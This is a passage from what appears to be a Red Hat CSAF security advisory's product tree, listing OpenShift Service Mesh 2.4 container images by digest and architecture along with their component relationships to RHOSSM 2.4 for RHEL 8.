"openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.65.16-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.4.11-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.4.11-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.4.11-2", }, }, }, ], category: "architecture", name: "arm64", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", product_id: "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", product_id: "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.65.16-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.4.11-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", product_id: "openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.4.11-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.4.11-2", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", product_id: "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", product_id: "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.65.16-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.4.11-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", product_id: "openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.4.11-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.4.11-2", }, }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.65.16-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.4.11-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.4.11-2", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.4.11-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.4.11-2", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", relates_to_product_reference: "8Base-RHOSSM-2.4", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64 as a component of RHOSSM 2.4 for RHEL 8", product_id: "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", }, product_reference: 